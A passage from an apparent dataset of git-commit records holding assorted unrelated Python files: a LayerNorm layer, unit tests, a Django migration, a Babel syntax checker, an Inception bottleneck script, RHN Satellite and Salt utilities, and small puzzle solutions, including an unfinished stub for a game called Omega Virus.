lambda obj: (obj.nO,)),
d_G=describe.Gradient("G"),
d_b=describe.Gradient("b")
)
class LayerNorm(Model):
name = 'layernorm'
def __init__(self, child, **kwargs):
self.child = child
self._layers = [child]
if 'nO' in kwargs:
self.nO = kwargs['nO']
elif getattr(child, 'nO', None):
self.nO = child.nO
self.nr_upd = 0
Model.__init__(self, **kwargs)
def predict(self, X):
X = self.child.predict(X)
N, mu, var = _get_moments(self.ops, X)
Xh = _forward(self.ops, X, mu, var)
y = Xh * self.G + self.b
return y
def begin_update(self, X, drop=0.):
X, backprop_child = self.child.begin_update(X, drop=0.)
N, mu, var = _get_moments(self.ops, X)
Xhat = _forward(self.ops, X, mu, var)
y, backprop_rescale = self._begin_update_scale_shift(Xhat)
def finish_update(dy, sgd=None):
dy = backprop_rescale(dy, sgd)
dist, sum_dy, sum_dy_dist = _get_d_moments(self.ops, dy, X, mu)
d_xhat = N * dy - sum_dy - dist * var**(-1.) * sum_dy_dist
d_xhat *= var ** (-1. / 2)
d_xhat /= N
return backprop_child(d_xhat, sgd)
drop *= getattr(self.child, 'drop_factor', 1.0)
y, bp_dropout = self.ops.dropout(y, drop)
assert y.dtype == 'float32'
return y, bp_dropout(finish_update)
def _begin_update_scale_shift(self, input__BI):
def finish_update(gradient__BI, sgd=None):
self.d_b += gradient__BI.sum(axis=0)
d_G = self.d_G
d_G += (gradient__BI * input__BI).sum(axis=0)
if sgd is not None:
sgd(self._mem.weights, self._mem.gradient, key=self.id)
return gradient__BI * self.G
return input__BI * self.G + self.b, finish_update
def _get_moments(ops, X):
mu = X.mean(axis=1, keepdims=True)
var = X.var(axis=1, keepdims=True) + 1e-08
return X.shape[0], mu, var
def _get_d_moments(ops, dy, X, mu):
dist = X-mu
return dist, ops.xp.sum(dy, axis=1, keepdims=True), ops.xp.sum(dy * dist, axis=1, keepdims=True)
def _forward(ops, X, mu, var):
return (X-mu) * var ** (-1./2.)
| mit | Python |
|
eefa1f039d935a7242bb14bdb6f672db1ff24302 | Create omega-virus.py | DrQuixote/omega_virus-python | omega-virus.py | omega-virus.py | #!/usr/bin/python
#
# Insert docopt user help menu here?
#
#
# End docopt
#
def sectors()
# Blue
# Green
# Red
# Yellow
def roomList()
# List of rooms
# Green (open rooms)
# Blue (requires blue key)
# Red (requires red key)
# Yellow (requires yellow key)
def roomContents()
# Each room can have one of:
# 1. An ADV
# 2. An access card
# 3. A Probe (more on this in a little bit)
# 4. A hazard
# 5. The virus (presumably chilling out)
# 6. Nothing at all
def items()
# Access keys (Blue, Red, Yellow)
# Decoder - yellow
# Disruptor - blue
# Negatron - red
# Probe
def players()
# Blue
# Green
# Red
# Yellow
def rng()
# Random number generator
# Values 0,1,2
def secretCode()
# Secret codes let players know where the virus is provided:
# a) They enter a room where the virus is
# b) They do not have all three weapons
# c) Should we let probes find the virus?
| cc0-1.0 | Python |
|
04f937a24279699164278d47fc5d0790a9062132 | add gunicorn.py | DoubleHYH/my_Blog,DoubleHYH/my_Blog,DoubleHYH/my_Blog | wsgi_gunicorn.py | wsgi_gunicorn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from werkzeug.contrib.fixers import ProxyFix
from app import create_app
app = create_app()
app.wsgi_app = ProxyFix(app.wsgi_app)
if __name__ == '__main__':
app.run(host='0.0.0.0')
| mit | Python |
|
6036f03328d4908b268fa1256b552d588dbcbfc8 | Add pytest unit test for Scenario Loop model. Refs #142 | radish-bdd/radish,radish-bdd/radish | tests/unit/test_scenarioloop.py | tests/unit/test_scenarioloop.py | # -*- coding: utf-8 -*-
"""
radish
~~~~~~
Behavior Driven Development tool for Python - the root from red to green
Copyright: MIT, Timo Furrer <tuxtimo@gmail.com>
"""
from radish.scenarioloop import ScenarioLoop
from radish.iterationscenario import IterationScenario
from radish.background import Background
from radish.stepmodel import Step
def test_creating_simple_scenarioloop():
"""
Test creating a simple ScenarioLoop
"""
# given & when
scenario = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# then
assert scenario.id == 1
assert scenario.keyword == 'Scenario Loop'
assert scenario.iterations_keyword == 'Iterations'
assert scenario.sentence == 'I am a Scenario Loop'
assert scenario.path == 'foo.feature'
assert scenario.line == 1
assert scenario.parent is None
assert scenario.tags == []
assert scenario.preconditions == []
assert scenario.background is None
def test_building_scenarioloop_scenarios(mocker):
"""
Test building Scenarios from a Scenario Loop
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
# then - expect that Scenarios are of type ExampleScenario
assert all(isinstance(x, IterationScenario) for x in scenario_loop.scenarios)
# then - expect correct Example Scenario sentences
assert scenario_loop.scenarios[0].sentence == 'I am a Scenario Loop - iteration 0'
assert scenario_loop.scenarios[1].sentence == 'I am a Scenario Loop - iteration 1'
# then - expect correctly replaced Step sentences
assert scenario_loop.scenarios[0].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[0].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[0].steps[2].sentence == 'When I add those'
assert scenario_loop.scenarios[1].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[1].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[1].steps[2].sentence == 'When I add those'
def test_building_scenarioloop_scenarios_with_background(mocker):
"""
Test building Scenarios from a Scenario Loop including a Background
"""
# given
background = Background('Background', 'I am a Background', 'foo.feature', 1, parent=None)
# add some Steps
background.steps.extend([
Step(1, 'Foo', 'foo.feature', 2, background, False),
Step(2, 'Foo', 'foo.feature', 3, background, False)
])
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=background)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect ExampleScenarios to have background copy assigned
assert scenario_loop.scenarios[0].background.sentence == 'I am a Background'
assert scenario_loop.scenarios[1].background.sentence == 'I am a Background'
def test_scenarioloop_afterparse_logic(mocker):
"""
Test Scenario Loop after parse logic
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when
scenario_loop.after_parse()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
assert scenario_loop.complete is True
| mit | Python |
|
a81f39089b4c60e2cb05ea892afacbcbea6f1c5d | add tests for oxml_parser | scanny/python-pptx,kevingu1003/python-pptx,hoopes/python-pptx,AlexMooney/python-pptx,cchanrhiza/python-pptx,biggihs/python-pptx | tests/oxml/test___init__.py | tests/oxml/test___init__.py | # encoding: utf-8
"""
Test suite for pptx.oxml.__init__.py module, primarily XML parser-related.
"""
from __future__ import print_function, unicode_literals
import pytest
from lxml import etree, objectify
from pptx.oxml import oxml_parser
class DescribeOxmlParser(object):
def it_enables_objectified_xml_parsing(self, xml_bytes):
foo = objectify.fromstring(xml_bytes, oxml_parser)
assert foo.bar == 'foobar'
def it_strips_whitespace_between_elements(self, foo, stripped_xml_bytes):
xml_bytes = etree.tostring(foo)
assert xml_bytes == stripped_xml_bytes
# ===========================================================================
# fixtures
# ===========================================================================
@pytest.fixture
def foo(xml_bytes):
return objectify.fromstring(xml_bytes, oxml_parser)
@pytest.fixture
def stripped_xml_bytes():
return (
'<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
'in"><a:bar>foobar</a:bar></a:foo>'
).encode('utf-8')
@pytest.fixture
def xml_bytes():
return (
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
'<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
'in">\n'
' <a:bar>foobar</a:bar>\n'
'</a:foo>\n'
).encode('utf-8')
| mit | Python |
|
f8c3feaf3f400cbcf3e04d9705f0cb36d083c6d7 | Include migratio for ProductPlan. | mblayman/lcp,mblayman/lcp,mblayman/lcp | conductor/accounts/migrations/0012_productplan.py | conductor/accounts/migrations/0012_productplan.py | # Generated by Django 2.0.9 on 2018-11-08 02:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("accounts", "0011_auto_20180831_0320")]
operations = [
migrations.CreateModel(
name="ProductPlan",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("active", models.BooleanField(default=False)),
("stripe_plan_id", models.CharField(max_length=32)),
("trial_days", models.IntegerField(default=0)),
],
)
]
| bsd-2-clause | Python |
|
4db13bdab18934bebcfe5b102044f936e0eab892 | Add a place to put random stuff and a list of components as a python module. | vitorio/ocropodium,vitorio/ocropodium,vitorio/ocropodium,vitorio/ocropodium | etc/component_list.py | etc/component_list.py | COMPONENTS = [
"AdaBoost",
"AutoInvert",
"AutoMlpClassifier",
"BiggestCcExtractor",
"BinarizeByHT",
"BinarizeByOtsu",
"BinarizeByRange",
"BinarizeBySauvola",
"BitDataset",
"BitNN",
"BookStore",
"CascadedMLP",
"CenterFeatureMap",
"ConnectedComponentSegmenter",
"CurvedCutSegmenter",
"CurvedCutWithCcSegmenter",
"Degradation",
"DeskewGrayPageByRAST",
"DeskewPageByRAST",
"DocClean",
"DpSegmenter",
"EnetClassifier",
"EuclideanDistances",
"KnnClassifier",
"LatinClassifier",
"Linerec",
"LinerecExtracted",
"MetaLinerec",
"NullLinerec",
"OcroFST",
"OldBookStore",
"PageFrameRAST",
"Pages",
"RaggedDataset8",
"RaveledExtractor",
"RmBig",
"RmHalftone",
"RmUnderline",
"RowDataset8",
"ScaledImageExtractor",
"SegmentLineByCCS",
"SegmentLineByGCCS",
"SegmentLineByProjection",
"SegmentPageBy1CP",
"SegmentPageByMorphTrivial",
"SegmentPageByRAST",
"SegmentPageByRAST1",
"SegmentPageByVORONOI",
"SegmentPageByXYCUTS",
"SegmentWords",
"SimpleFeatureMap",
"SimpleGrouper",
"SkelSegmenter",
"SmartBookStore",
"SqliteBuffer",
"SqliteDataset",
"StandardExtractor",
"StandardGrouper",
"StandardPreprocessing",
"TextImageSegByLogReg",
"adaboost",
"biggestcc",
"bitdataset",
"bitnn",
"cfmap",
"cmlp",
"dpseg",
"edist",
"enet",
"knn",
"latin",
"linerec",
"linerec_extracted",
"mappedmlp",
"metalinerec",
"mlp",
"nulllinerec",
"raggeddataset8",
"raveledfe",
"rowdataset8",
"scaledfe",
"sfmap",
"simplegrouper",
"sqlitebuffer",
"sqliteds",
]
| apache-2.0 | Python |
|
f7aeb7a708ef2e40546d27d480073fdc113d639e | Add check_babel_syntax ; see note below | orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode | unnaturalcode/check_babel_syntax.py | unnaturalcode/check_babel_syntax.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
# Takes in a string of JavaScript code and checks for errors
# NOTE: FOR BABEL
import os
import subprocess
import sys
import tempfile
from compile_error import CompileError
# Method for finding index of certain characters in a string, n being the n'th occurence of the character/string
def find_nth(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+len(needle))
n -= 1
return start
# Main method
def checkBabelSyntax(src):
myFile = open("toCheck.js", "w")
myFile.write(src)
myFile.close()
proc = subprocess.Popen(['node_modules/.bin/babel', 'toCheck.js', '-o', '/dev/null'], stderr=subprocess.PIPE)
streamdata, err = proc.communicate()
rc = proc.returncode
if rc == 0:
# No errors, all good
os.remove("toCheck.js")
return None
else:
# Error, disect data for constructor
colonFirInd = find_nth(err, ':', 1)
colonSecInd = find_nth(err, ':', 2)
colonThirInd = find_nth(err, ':', 3)
lineBegin = find_nth(err, '(', 1)
lineEnd = find_nth(err, ')', 1)
fileName = err[colonFirInd+2:colonSecInd]
line = int(err[lineBegin+1:colonThirInd])
column = int(err[colonThirInd+1:lineEnd])
errorname = err[0:colonFirInd]
flagStart = find_nth(err, '>', 1)
temp = err[flagStart:]
ind = find_nth(temp, '\n', 1)
textBefore = err[colonSecInd+2:lineBegin-1]
textAfter = err[flagStart+26:flagStart+ind]
text = textBefore + ' ' + textAfter
errorObj = CompileError(fileName, line, column, None, text, errorname)
os.remove("toCheck.js")
return [errorObj]
| agpl-3.0 | Python |
|
3196eeb928c5715ba20d21d0d16a3087938bf6c9 | Add tools/compute_bottleneck.py. | openimages/dataset,openimages/dataset,openimages/dataset | tools/compute_bottleneck.py | tools/compute_bottleneck.py | #!/usr/bin/env python
#
# Copyright 2016 The Open Images Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# This script takes an Inception v3 checkpoint, runs the classifier
# on the image and prints the values from the bottleneck layer.
# Example:
# $ wget -O /tmp/cat.jpg https://farm6.staticflickr.com/5470/9372235876_d7d69f1790_b.jpg
# $ ./tools/compute_bottleneck.py /tmp/cat.jpg
#
# Make sure to download the ANN weights and support data with:
# $ ./tools/download_data.sh
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import sys
import os.path
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim.python.slim.nets import inception
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import saver as tf_saver
from tensorflow.python.training import supervisor
slim = tf.contrib.slim
FLAGS = None
def PreprocessImage(image_path):
"""Load and preprocess an image.
Args:
image_path: path to an image
Returns:
An ops.Tensor that produces the preprocessed image.
"""
if not os.path.exists(image_path):
tf.logging.fatal('Input image does not exist %s', image_path)
img_data = tf.gfile.FastGFile(image_path).read()
# Decode Jpeg data and convert to float.
img = tf.cast(tf.image.decode_jpeg(img_data, channels=3), tf.float32)
# Make into a 4D tensor by setting a 'batch size' of 1.
img = tf.expand_dims(img, [0])
img = tf.image.crop_and_resize(
img,
# Whole image
tf.constant([0, 0, 1.0, 1.0], shape=[1, 4]),
# One box
tf.constant([0], shape=[1]),
# Target size is image_size x image_size
tf.constant([FLAGS.image_size, FLAGS.image_size], shape=[2]))
# Center the image about 128.0 (which is done during training) and normalize.
img = tf.mul(img, 1.0/127.5)
return tf.sub(img, 1.0)
def main(args):
if not os.path.exists(FLAGS.checkpoint):
tf.logging.fatal(
'Checkpoint %s does not exist. Have you download it? See tools/download_data.sh',
FLAGS.checkpoint)
g = tf.Graph()
with g.as_default():
input_image = PreprocessImage(FLAGS.image_path[0])
with slim.arg_scope(inception.inception_v3_arg_scope()):
logits, end_points = inception.inception_v3(
input_image, num_classes=FLAGS.num_classes, is_training=False)
bottleneck = end_points['PreLogits']
init_op = control_flow_ops.group(variables.initialize_all_variables(),
variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables())
saver = tf_saver.Saver()
sess = tf.Session()
saver.restore(sess, FLAGS.checkpoint)
# Run the evaluation on the image
bottleneck_eval = np.squeeze(sess.run(bottleneck))
first = True
for val in bottleneck_eval:
if not first:
sys.stdout.write(",")
first = False
sys.stdout.write('{:.3f}'.format(val))
sys.stdout.write('\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--checkpoint', type=str, default='data/2016_08/model.ckpt',
help='Checkpoint to run inference on.')
parser.add_argument('--image_size', type=int, default=299,
help='Image size to run inference on.')
parser.add_argument('--num_classes', type=int, default=6012,
help='Number of output classes.')
parser.add_argument('image_path', nargs=1, default='')
FLAGS = parser.parse_args()
tf.app.run()
| apache-2.0 | Python |
|
d7568806a81c52f268673422dbbe60117f4b490c | Add plugins test cases | menecio/django-api-bouncer | tests/test_plugin.py | tests/test_plugin.py | from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth import get_user_model
from api_bouncer.models import Api
User = get_user_model()
class ConsumerKeyTests(APITestCase):
def setUp(self):
self.superuser = User.objects.create_superuser(
'john',
'john@localhost.local',
'john123john'
)
self.user = User.objects.create_user(
'jane',
'jane@localhost.local',
'jane123jane'
)
self.example_api = Api.objects.create(
name='example-api',
hosts=['example.com'],
upstream_url='https://httpbin.org'
)
self.url = '/apis/{}/plugins/'
def test_api_add_plugin(self):
"""
Ensure we can add a plugin to an api as superusers.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
def test_api_add_plugin_403(self):
"""
Ensure we can add a plugin to an api only as superusers.
"""
self.client.login(username='jane', password='jane123jane')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_api_add_plugin_wrong_name(self):
"""
Ensure we can't add a plugin to an api that doesn't exist.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'na-ah',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data['errors'], 'Invalid plugin name')
def test_api_add_plugin_modify_partially_config(self):
"""
Ensure we can partially modify a plugin configuration.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
expected_res = response.data
expected_res['config'].update({'anonymous': 'citizen-four'})
data.update({'config': {'anonymous': 'citizen-four'}})
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(response.data, expected_res)
def test_api_add_plugin_no_extra_keys(self):
"""
Ensure we can't add arguments not defined on plugin's schema.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
data.update({'config': {'you_shall_not_pass': True}})
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| apache-2.0 | Python |
|
b29fe95eb2cb86a7ae9170fbf8ceb2533bc84578 | Add the photo.index module (with minimal functionality so far). | RKrahl/photo-tools | photo/index.py | photo/index.py | """Provide the class Index which represents an index of photos.
"""
import os
import os.path
import fnmatch
from collections import MutableSequence
import yaml
class Index(MutableSequence):
defIdxFilename = ".index.yaml"
def __init__(self, idxfile=None, imgdir=None):
super(Index, self).__init__()
self.directory = None
self.idxfilename = None
self.items = []
if idxfile:
self.read(idxfile)
elif imgdir:
self.readdir(imgdir)
def __len__(self):
return len(self.items)
def __getitem__(self, index):
return self.items.__getitem__(index)
def __setitem__(self, index, value):
self.items.__setitem__(index, value)
def __delitem__(self, index):
self.items.__delitem__(index)
def insert(self, index, value):
self.items.insert(index, value)
def _idxfilename(self, idxfile):
"""Determine the index file name for reading and writing.
"""
if idxfile is not None:
return os.path.abspath(idxfile)
elif self.idxfilename is not None:
return self.idxfilename
else:
d = self.directory if self.directory is not None else os.getcwd()
return os.path.abspath(os.path.join(d, self.defIdxFilename))
def readdir(self, imgdir):
"""Create a new index of all image files in a directory.
"""
self.directory = os.path.abspath(imgdir)
self.items = []
for f in sorted(os.listdir(self.directory)):
if (os.path.isfile(os.path.join(self.directory,f)) and
fnmatch.fnmatch(f, '*.jpg')):
self.items.append({'filename':f, 'tags':[]})
def read(self, idxfile=None):
"""Read the index from a file.
"""
self.idxfilename = self._idxfilename(idxfile)
self.directory = os.path.dirname(self.idxfilename)
with open(self.idxfilename, 'rt') as f:
self.items = yaml.load(f)
def write(self, idxfile=None):
"""Write the index to a file.
"""
self.idxfilename = self._idxfilename(idxfile)
self.directory = os.path.dirname(self.idxfilename)
with open(self.idxfilename, 'wt') as f:
yaml.dump(self.items, f, default_flow_style=False)
| apache-2.0 | Python |
|
eff993eac0924299cd273d0c582e24c57f2c4a84 | Add 263-ugly-number.py | mvj3/leetcode | 263-ugly-number.py | 263-ugly-number.py | """
Question:
Ugly Number
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 19816 Total Submissions: 60714 Difficulty: Easy
2. Your runtime beats 60.64% of python submissions.
"""
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num == 0:
return False
for ugly_divisor in [2, 3, 5]:
while (num % ugly_divisor) == 0:
num /= ugly_divisor
return num == 1
assert Solution().isUgly(0) is False
assert Solution().isUgly(1) is True
assert Solution().isUgly(2) is True
assert Solution().isUgly(3) is True
assert Solution().isUgly(4) is True
assert Solution().isUgly(5) is True
assert Solution().isUgly(6) is True
assert Solution().isUgly(7) is False
assert Solution().isUgly(8) is True
assert Solution().isUgly(9) is True
assert Solution().isUgly(10) is True
assert Solution().isUgly(11) is False
assert Solution().isUgly(12) is True
assert Solution().isUgly(14) is False
assert Solution().isUgly(-2147483648) is False
| mit | Python |
|
063096a5b52945666ec2d61bfe5201ad53461614 | Create rhn-channel-add-scl.py | vladionescu/RHN-Scripts | rhn-channel-add-scl.py | rhn-channel-add-scl.py | #!/usr/bin/python
import xmlrpclib
import sys, array
"""RHN Satellite API setup"""
SATELLITE_URL = "https://rhn.domain.tld/rpc/api"
SATELLITE_LOGIN = "username"
SATELLITE_PASSWORD = "password"
"""If the user didn't specify any hosts, show usage."""
if len(sys.argv) < 2:
sys.exit("Usage:\n\t"+sys.argv[0]+" <hostname> [hostname] ...")
"""Connect to RHN Satellite API"""
client = xmlrpclib.Server(SATELLITE_URL, verbose=0)
key = client.auth.login(SATELLITE_LOGIN, SATELLITE_PASSWORD)
# systems we will add channel to
ids = array.array('i')
# channel we will add to systems
to_add = ''
for hostname in sys.argv[1:]:
"""
Assume every argument is a hostname.
Search my RHN Satellite systems for any
system whose hostname starts with any
the arguments given.
Takes the IDs of all found systems and
stores them in a (global) variable.
"""
# get a list of all systems that have this hostname
systems = client.system.search.hostname(key, hostname)
# add these system's ids to the list of global ids
for system in systems:
ids.append(system['id'])
if len(ids) != 0:
"""
If systems were found, get the first
one and find the name of the SCL
channel.
Otherwise, throw an error and exit.
"""
# try to find SCL in the list of channels this system is
# NOT currently subscribed to
channels = client.system.listSubscribableChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
if len(to_add) < 2:
"""
If the channel was not found, try to find SCL in the list
of channels this system IS subscribed to. The API
doesn't allow listing of all channels associated with a sys.
"""
channels = client.system.listSubscribedChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
else:
sys.stderr.write('No systems were found')
exit(1)
for id in ids:
"""
Add the SCL channel to every system found above.
"""
# need to get all subscribed channels first
# since setChildChannels is absolute.
current_channels = client.system.listSubscribedChildChannels(key, id)
# create an array of the channels system will be subscribed to
# and include existing channels.
channels = []
for channel in current_channels:
channels.append(channel['label'])
for channel in channels:
# if the channel to be added already exists, don't double add
if channel == to_add:
break
else:
# if the channel doesn't already exist, add it!
channels.append(to_add)
# finally, set all those channels as the current subscriptions
client.system.setChildChannels(key, id, channels)
# write a success message
print("\033[1;32mSuccess:\033[1;m\nSystem "+str(id)+": "+str(channels))
"""Kill the connection to RHN"""
client.auth.logout(key)
| mit | Python |
|
cd44e4a62e8c8f8ddba0634ccc0bb157f7745726 | add 129 | EdisonAlgorithms/ProjectEuler,zeyuanxy/project-euler,zeyuanxy/project-euler,zeyuanxy/project-euler,EdisonAlgorithms/ProjectEuler,EdisonAlgorithms/ProjectEuler,zeyuanxy/project-euler,EdisonAlgorithms/ProjectEuler | vol3/129.py | vol3/129.py | def A(n):
if n % 5 == 0:
return 1
x = 1
ret = 1
while x != 0:
x = (x * 10 + 1) % n
ret += 1
return ret
if __name__ == "__main__":
LIMIT = 10 ** 6
i = LIMIT + 1
while A(i) <= LIMIT:
i += 2
print i
| mit | Python |
|
0ede4e22370a3f8217fee8ff995a9c7057d8b00b | Add test for redis test helper | praekelt/vumi-http-retry-api,praekelt/vumi-http-retry-api | vumi_http_retry/tests/test_redis.py | vumi_http_retry/tests/test_redis.py | import json
from twisted.trial.unittest import TestCase
from twisted.internet.defer import inlineCallbacks
from vumi_http_retry.tests.redis import create_client, zitems
class TestRedis(TestCase):
@inlineCallbacks
def setUp(self):
self.redis = yield create_client()
@inlineCallbacks
def tearDown(self):
yield self.redis.delete('foo')
yield self.redis.transport.loseConnection()
@inlineCallbacks
def test_add_request(self):
self.assertEqual((yield zitems(self.redis, 'foo')), [])
yield self.redis.zadd('foo', 1, json.dumps({'bar': 23}))
self.assertEqual((yield zitems(self.redis, 'foo')), [
(1, {'bar': 23}),
])
yield self.redis.zadd('foo', 2, json.dumps({'baz': 42}))
self.assertEqual((yield zitems(self.redis, 'foo')), [
(1, {'bar': 23}),
(2, {'baz': 42}),
])
| bsd-3-clause | Python |
|
d0237f2b77a49933a4b22b43f967e414be196ff4 | Add sysmod module to replace old introspection modules | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | salt/modules/sysmod.py | salt/modules/sysmod.py | '''
The sys module provides information about the available functions on the
minion.
'''
def __virtual__():
'''
Return as sys
'''
return 'sys'
def doc(module=''):
'''
Return the docstrings for all modules, these strings are aggregated into
a single document on the master for easy reading.
CLI Example::
salt \* sys.doc
'''
docs = {}
for fun in __salt__:
if fun.startswith(module):
docs[fun] = __salt__[fun].__doc__
return docs
def list_functions(module=''):
'''
List the functions. Optionally, specify a module to list from.
CLI Example::
salt \* sys.list_functions
'''
names = set()
for func in __salt__:
if module:
if func.startswith('{0}.'.format(module)):
names.add(func)
else:
names.add(func)
return sorted(names)
def list_modules():
'''
List the modules loaded on the minion
CLI Example::
salt \* sys.list_modules
'''
modules = set()
for func in __salt__:
comps = func.split('.')
if len(comps) < 2:
continue
modules.add(comps[0])
return sorted(modules)
def reload_modules():
'''
Tell the minion to reload the execution modules
CLI Example::
salt \* sys.reload_modules
'''
# This is handled inside the minion.py file, the function is caught before
# it ever gets here
return True
| apache-2.0 | Python |
|
fa55ceb71ff254f8ed3413a35acfe20da7c03a91 | Create BT Comm wrapper class | javatechs/RxCmd,javatechs/RxCmd,javatechs/RxCmd | rxbtcomm.py | rxbtcomm.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<programmingrobotsstudygroup@gmail.com>
# See LICENSE for details.
import bluetooth
import logging
class RxBtComm(object):
"""BT communication wrapper:
Attributes:
addy: A string representing the device address.
name: A string representing the device name.
"""
logging.basicConfig(level=logging.DEBUG)
def __init__(self, addr, name=None):
"""Return a RxBtComm object
param *addr* device address
param *name* device name
"""
self.addr = addr
self.name = name
self.sock = None
"""connect:
Connect to BT addr
"""
def connect(self):
try:
port = 1
self.sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
self.sock.connect((self.addr, port))
return bluetooth.lookup_name(self.addr)
except Exception as e:
logging.exception(e)
return ''
"""disconnect:
Disconnect from BT addr
"""
def disconnect(self):
try:
self.sock.close()
except Exception as e:
logging.exception(e)
self.sock = None
"""send:
